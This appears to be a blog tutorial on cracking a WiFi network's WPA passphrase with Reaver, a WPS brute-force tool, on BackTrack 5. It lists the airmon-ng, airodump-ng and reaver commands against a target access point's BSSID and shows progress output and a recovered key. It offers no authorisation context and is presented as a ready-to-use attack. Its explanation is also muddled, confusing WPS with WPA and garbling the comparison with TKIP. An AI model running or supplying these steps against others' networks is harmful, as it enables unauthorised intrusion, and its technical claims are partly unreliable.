Previous post we discussed that WEP (Wired Equivalent Privacy/Wireless Encryption Protocol) is less secure mechanism since it use static key for encryption. So, we able to cracked it within few minutes.

After the generation of WEP, we use WPA (WiFi Protected Access) for wireless protection. WPA uses Temporal Key Integrity Protocol (TKIP) for encryption. In TKIP encryption key changes with every data packet, checks message integrity and generate unique keys for each wireless client. So, that makes WiFi more secure than WPA encryption.

WPA Crack












But this isn’t say that WPA secure in 100%. There are some ways to crack WPA key as well.

1. Brute Force attack

2. Dictionary Attack

If someone uses dictionary word as a WPA passphrase easy way of cracking is “Dictionary” attacks. But if it is random key, “Brute Force” will be the easiest way of cracking. But this takes few hours to crack it.

Here we are talking about Brute force attack against WiFi protected setup is using a tool called “Reaver”. Reaver has installed in backtrack5.

1. Configure your Wireless card into monitor mode

# airmon-ng start wlan0

eth0 up









2. Use airdump to have BSSID of the target AP

# airodump-ng mon0 (mon0 is the monitor mode interface)

wireless monitoring










3. Run reaver with following command

# reaver -i mon0 -b BSSID

example #reaver -i mon0 -b 00:0E:2E:C9:57:C6

here you can add some parameters to speeding up the attack as bellow

example #reaver -i mon0 -b 00:0E:2E:C9:57:C6 -vv –dh-small








Your part is over now. Wait till reaver crack the WPA key. Normally this will take 4hr – 10hr.

95.45% complete…

running reaver












Here we found the WPA passphrase key.

WPA cracked












Download Reaver


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s